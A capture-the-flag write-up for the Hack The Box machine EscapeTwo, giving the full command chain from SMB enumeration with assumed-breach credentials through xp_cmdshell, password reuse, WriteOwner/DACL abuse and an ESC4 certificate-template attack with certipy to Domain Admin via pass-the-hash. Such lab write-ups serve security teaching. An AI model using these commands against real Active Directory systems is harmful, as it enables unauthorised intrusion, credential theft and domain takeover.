Description
EscapeTwo is an easy Hack The Box machine that features:
- Initial access using an assumed breach scenario that leads in a discovery of a SMB share
- SMB share with damaged spreadsheet reveal DB Administrator credentials
- DB Administrator is able to run commands and read a file with credentials
- Credential’s user have
WriteOwnerpermission over Certification Authority account - Certification Authority account password can be changed
- Privilege Escalation via a vulnerability in a certification template
Footprinting
First, we are going to check with ping command if the machine is active and the system operating system. The target machine IP address is 10.129.241.157.
$ ping -c 3 10.129.241.157
PING 10.129.241.157 (10.129.241.157) 56(84) bytes of data.
64 bytes from 10.129.241.157: icmp_seq=1 ttl=127 time=53.8 ms
64 bytes from 10.129.241.157: icmp_seq=2 ttl=127 time=54.2 ms
64 bytes from 10.129.241.157: icmp_seq=3 ttl=127 time=53.2 ms
--- 10.129.241.157 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2004ms
rtt min/avg/max/mdev = 53.226/53.739/54.216/0.405 ms
The machine is active and with the TTL that equals 127 (128 minus 1 jump) we can assure that it is an Windows machine. Now we are going to do a Nmap TCP SYN port scan to check all opened ports.
$ sudo nmap 10.129.241.157 -sS -oN nmap_scan
Starting Nmap 7.94SVN ( https://nmap.org )
Nmap scan report for 10.129.241.157
Host is up (0.054s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
Nmap done: 1 IP address (1 host up) scanned in 5.68 seconds
We get many open ports, related to a Domain Controller Active Directory.
Enumeration
Then we do a more advanced scan, with service version and scripts.
$ nmap 10.129.241.157 -Pn -sV -sC -p53,88,135,139,389,445,464,593,636,1433,3268,3269 -oN nmap_scan_ports
Starting Nmap 7.94SVN ( https://nmap.org )
Nmap scan report for 10.129.241.157
Host is up (0.058s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.129.241.157:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.241.157:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-09T13:11:12
|_Not valid after: 2055-01-09T13:11:12
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2s, deviation: 0s, median: 2s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.53 seconds
We get the services related to an Active Directory, specifically the Domain Controller DC01.sequel.htb. We add the hosts to our /etc/hosts local file.
$ echo "10.129.241.157 sequel.htb" | sudo tee -a /etc/hosts
$ echo "10.129.241.157 DC01.sequel.htb" | sudo tee -a /etc/hosts
We have the credentials of the rose user, KxEPkKe6R8su, as an assumed breach, so we are going to start by enumerating the users and the SMB shares.
$ netexec smb sequel.htb -u rose -p KxEPkKe6R8su --users --shares
SMB 10.129.241.157 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.241.157 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su
SMB 10.129.241.157 445 DC01 [*] Enumerated shares
SMB 10.129.241.157 445 DC01 Share Permissions Remark
SMB 10.129.241.157 445 DC01 ----- ----------- ------
SMB 10.129.241.157 445 DC01 Accounting Department READ
SMB 10.129.241.157 445 DC01 ADMIN$ Remote Admin
SMB 10.129.241.157 445 DC01 C$ Default share
SMB 10.129.241.157 445 DC01 IPC$ READ Remote IPC
SMB 10.129.241.157 445 DC01 NETLOGON READ Logon server share
SMB 10.129.241.157 445 DC01 SYSVOL READ Logon server share
SMB 10.129.241.157 445 DC01 Users READ
SMB 10.129.241.157 445 DC01 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.129.241.157 445 DC01 Administrator 2024-06-08 16:32:20 0 Built-in account for administering the computer/domain
SMB 10.129.241.157 445 DC01 Guest 2024-12-25 14:44:53 0 Built-in account for guest access to the computer/domain
SMB 10.129.241.157 445 DC01 krbtgt 2024-06-08 16:40:23 0 Key Distribution Center Service Account
SMB 10.129.241.157 445 DC01 michael 2024-06-08 16:47:37 0
SMB 10.129.241.157 445 DC01 ryan 2024-06-08 16:55:45 0
SMB 10.129.241.157 445 DC01 oscar 2024-06-08 16:56:36 0
SMB 10.129.241.157 445 DC01 sql_svc 2024-06-09 07:58:42 0
SMB 10.129.241.157 445 DC01 rose 2024-12-25 14:44:54 0
SMB 10.129.241.157 445 DC01 ca_svc 2025-01-11 22:07:38 0
SMB 10.129.241.157 445 DC01 [*] Enumerated 9 local users: SEQUEL
We have read access to a share, Accounting Department, and the listed users are: Administrator, ryan, oscar, sql_svc, rose and ca_svc. If we enumerate the share, we find two spreadsheets: accounting_2024.xlsx and accounts.xlsx. We extract them.
$ smbclient '\\sequel.htb\Accounting Department' -U 'rose%KxEPkKe6R8su'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jun 9 12:52:21 2024
.. D 0 Sun Jun 9 12:52:21 2024
accounting_2024.xlsx A 10217 Sun Jun 9 12:14:49 2024
accounts.xlsx A 6780 Sun Jun 9 12:52:07 2024
6367231 blocks of size 4096. 849888 blocks available
smb: \> get accounting_2024.xlsx
getting file \accounting_2024.xlsx of size 10217 as accounting_2024.xlsx (34,9 KiloBytes/sec) (average 34,9 KiloBytes/sec)
smb: \> get accounts.xlsx
getting file \accounts.xlsx of size 6780 as accounts.xlsx (23,1 KiloBytes/sec) (average 29,0 KiloBytes/sec)
If we try to open them we find that they are damaged. As the .xlsx is a .zip file we are going to extract accounts.xlsx file and check for its contents.
$ unzip accounts.xlsx -d accounts
Archive: accounts.xlsx
file #1: bad zipfile offset (local header sig): 0
inflating: accounts/xl/workbook.xml
inflating: accounts/xl/theme/theme1.xml
inflating: accounts/xl/styles.xml
inflating: accounts/xl/worksheets/_rels/sheet1.xml.rels
inflating: accounts/xl/worksheets/sheet1.xml
inflating: accounts/xl/sharedStrings.xml
inflating: accounts/_rels/.rels
inflating: accounts/docProps/core.xml
inflating: accounts/docProps/app.xml
inflating: accounts/docProps/custom.xml
inflating: accounts/[Content_Types].xml
In the accounts/xl/sharedStrings.xml file we find user credentials for angela, oscar, kevin and sa users.
$ xmllint --format accounts/xl/sharedStrings.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="25" uniqueCount="24">
<si>
<t xml:space="preserve">First Name</t>
</si>
<si>
<t xml:space="preserve">Last Name</t>
</si>
<si>
<t xml:space="preserve">Email</t>
</si>
<si>
<t xml:space="preserve">Username</t>
</si>
<si>
<t xml:space="preserve">Password</t>
</si>
<si>
<t xml:space="preserve">Angela</t>
</si>
<si>
<t xml:space="preserve">Martin</t>
</si>
<si>
<t xml:space="preserve">angela@sequel.htb</t>
</si>
<si>
<t xml:space="preserve">angela</t>
</si>
<si>
<t xml:space="preserve">0fwz7Q4mSpurIt99</t>
</si>
<si>
<t xml:space="preserve">Oscar</t>
</si>
<si>
<t xml:space="preserve">Martinez</t>
</si>
<si>
<t xml:space="preserve">oscar@sequel.htb</t>
</si>
<si>
<t xml:space="preserve">oscar</t>
</si>
<si>
<t xml:space="preserve">86LxLBMgEWaKUnBG</t>
</si>
<si>
<t xml:space="preserve">Kevin</t>
</si>
<si>
<t xml:space="preserve">Malone</t>
</si>
<si>
<t xml:space="preserve">kevin@sequel.htb</t>
</si>
<si>
<t xml:space="preserve">kevin</t>
</si>
<si>
<t xml:space="preserve">Md9Wlq1E5bZnVDVo</t>
</si>
<si>
<t xml:space="preserve">NULL</t>
</si>
<si>
<t xml:space="preserve">sa@sequel.htb</t>
</si>
<si>
<t xml:space="preserve">sa</t>
</si>
<si>
<t xml:space="preserve">MSSQLP@ssw0rd!</t>
</si>
</sst>
sa is the local Microsoft SQL Server administrator and its password is MSSQLP@ssw0rd!. We can connect to the database and try to gain remote command execution using impacket-mssql tool.
$ impacket-mssqlclient 'sa:MSSQLP@ssw0rd!'@sequel.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (sa dbo@master)> xp_cmdshell whoami
ERROR(DC01\SQLEXPRESS): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
We cannot run commands as the xp_cmdshell component is deactivated.
Exploitation
We are able to active the xp_cmdshell component with the enable_xp_cmdshell command. We can run commands as the sequel\sql_svc user.
SQL (sa dbo@master)> enable_xp_cmdshell
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (sa dbo@master)> xp_cmdshell whoami
output
--------------
sequel\sql_svc
NULL
Exploring the file system, we find a file, C:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI, with credentials related to the database. The password for sql_svc user is WqSZAF6CysDQbGb3.
SQL (sa dbo@master)> xp_cmdshell dir C:\
output
----------------------------------------------------------
...
11/05/2022 11:03 AM <DIR> PerfLogs
01/04/2025 07:11 AM <DIR> Program Files
06/09/2024 07:37 AM <DIR> Program Files (x86)
06/08/2024 02:07 PM <DIR> SQL2019
06/09/2024 05:42 AM <DIR> Users
01/04/2025 08:10 AM <DIR> Windows
...
SQL (sa dbo@master)> xp_cmdshell dir C:\SQL2019
output
...
06/08/2024 02:07 PM <DIR> .
06/08/2024 02:07 PM <DIR> ..
01/03/2025 07:29 AM <DIR> ExpressAdv_ENU
...
SQL (sa dbo@master)> xp_cmdshell dir C:\SQL2019\ExpressAdv_ENU
output
---------------------------------------------------------------
...
01/03/2025 07:29 AM <DIR> .
01/03/2025 07:29 AM <DIR> ..
06/08/2024 02:07 PM <DIR> 1033_ENU_LP
09/24/2019 09:03 PM 45 AUTORUN.INF
09/24/2019 09:03 PM 788 MEDIAINFO.XML
06/08/2024 02:07 PM 16 PackageId.dat
06/08/2024 02:07 PM <DIR> redist
06/08/2024 02:07 PM <DIR> resources
09/24/2019 09:03 PM 142,944 SETUP.EXE
09/24/2019 09:03 PM 486 SETUP.EXE.CONFIG
06/08/2024 02:07 PM 717 sql-Configuration.INI
09/24/2019 09:03 PM 249,448 SQLSETUPBOOTSTRAPPER.DLL
06/08/2024 02:07 PM <DIR> x64
...
SQL (sa dbo@master)> xp_cmdshell type C:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI
output
-------------------------------------------------
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False"
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True
...
Let’s check if the password is reused for another user in the domain.
$ netexec smb sequel.htb -u users -p 'WqSZAF6CysDQbGb3'
SMB 10.129.241.157 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.241.157 445 DC01 [-] sequel.htb\Administrator:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
SMB 10.129.241.157 445 DC01 [+] sequel.htb\ryan:WqSZAF6CysDQbGb3
The password is reused for the ryan user. Let’s try to get a remote sessions using evil-winrm tool.
$ evil-winrm -i sequel.htb -u 'ryan' -p 'WqSZAF6CysDQbGb3' Evil-WinRM shell v3.6
...
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami
sequel\ryan
We get a session as the ryan user.
Post-Exploitation
Let’s use PowerView tool to check for weaknesses in the ACLs of the domain.
$ cp /usr/share/windows-resources/powersploit/Recon/PowerView.ps1 . $ evil-winrm -i sequel.htb -u 'ryan' -p 'WqSZAF6CysDQbGb3'
...
*Evil-WinRM* PS C:\Users\ryan\Documents> upload PowerView.ps1
Info: Uploading PowerView.ps1 to C:\Users\ryan\Documents\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\ryan\Documents> . .\PowerView.ps1; Find-InterestingDomainAcl -ResolveGUIDs | ? {$_.IdentityReferenceName -eq "ryan"}
ObjectDN : CN=Certification Authority,CN=Users,DC=sequel,DC=htb
AceQualifier : AccessAllowed
ActiveDirectoryRights : WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-548670397-972687484-3496335370-1114
IdentityReferenceName : ryan
IdentityReferenceDomain : sequel.htb
IdentityReferenceDN : CN=Ryan Howard,CN=Users,DC=sequel,DC=htb
IdentityReferenceClass : user
We find that ryan user has the WriteOwner right over the user with Certification Authority.
*Evil-WinRM* PS C:\Users\ryan\Documents> . .\PowerView.ps1; Get-DomainUser "CN=Certification Authority,CN=Users,DC=sequel,DC=htb"
logoncount : 0
badpasswordtime : 6/9/2024 10:14:40 AM
distinguishedname : CN=Certification Authority,CN=Users,DC=sequel,DC=htb
objectclass : {top, person, organizationalPerson, user}
displayname : Certification Authority
lastlogontimestamp : 6/9/2024 10:14:42 AM
userprincipalname : ca_svc@sequel.htb
name : Certification Authority
Certification Authority user has the ca_svc username. With this access grant we can rewrite the owner of the ca_svc user to ryan and we can change its password to be able to operate. We will rewrite the owner with the impacket-owneredit, we will change the DACL with impacket-dacledit tool and we will change the password with rpcclient tool.
$ impacket-owneredit -action write -new-owner 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Current owner information below
[*] - SID: S-1-5-21-548670397-972687484-3496335370-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=sequel,DC=htb
[*] OwnerSid modified successfully!
$ impacket-dacledit -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit.bak
[*] DACL modified successfully!
$ rpcclient -U 'sequel.htb/ryan%WqSZAF6CysDQbGb3' sequel.htb
rpcclient $> setuserinfo2 ca_svc 23 'new_password'
Now, as we have access to the ca_svc user we are going to search for vulnerabilities in the templates of the Active Directory Certificate Services with certipy-ad tool.
$ certipy-ad find -username ca_svc@sequel.htb -password new_password -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'sequel-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : sequel-DC01-CA
DNS Name : DC01.sequel.htb
Certificate Subject : CN=sequel-DC01-CA, DC=sequel, DC=htb
Certificate Serial Number : 152DBD2D8E9C079742C0F3BFF2A211D3
Certificate Validity Start : 2024-06-08 16:50:40+00:00
Certificate Validity End : 2124-06-08 17:00:40+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : SEQUEL.HTB\Administrators
Access Rights
ManageCertificates : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
ManageCa : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Enroll : SEQUEL.HTB\Authenticated Users
Certificate Templates
0
Template Name : DunderMifflinAuthentication
Display Name : Dunder Mifflin Authentication
Certificate Authorities : sequel-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectRequireCommonName
SubjectAltRequireDns
Enrollment Flag : AutoEnrollment
PublishToDs
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1000 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Enterprise Admins
Full Control Principals : SEQUEL.HTB\Cert Publishers
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Property Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
[!] Vulnerabilities
ESC4 : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions
We find a vulnerability in the Certification Authority sequel-DC01-CA template DunderMifflinAuthentication. ESC4 meaning SEQUEL.HTB\Cert Publishers has dangerous permissions. We can abuse this vulnerability by modifying the template to trigger other vulnerabilities and then use them to generate an authentication certificate for the Administrator user. We start with the rewriting of the template, saving the old one.
$ certipy-ad template -u ca_svc -p 'new_password' -template DunderMifflinAuthentication -target DC01.sequel.htb -save-old
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Saved old configuration for 'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json'
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'
Then we request the domain admin certificate using the new template.
$ certipy-ad req -ca sequel-DC01-CA -u ca_svc -p 'new_password' -template DunderMifflinAuthentication -target DC01.sequel.htb -upn administrator@sequel.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 8
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
And finally we authenticate using the certificate to obtain the NTLM hash, 7a8d4e04986afa8ed4060f75e5a0b3ff.
$ certipy-ad auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff
We can login as Domain Administrator using evil-winrm.
$ evil-winrm -i sequel.htb -u 'Administrator' -H '7a8d4e04986afa8ed4060f75e5a0b3ff'
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator
Flags
In the Domain Admin shell we can retrieve the user and administrator flags.
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\ryan\Desktop\user.txt
<REDACTED>
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
<REDACTED>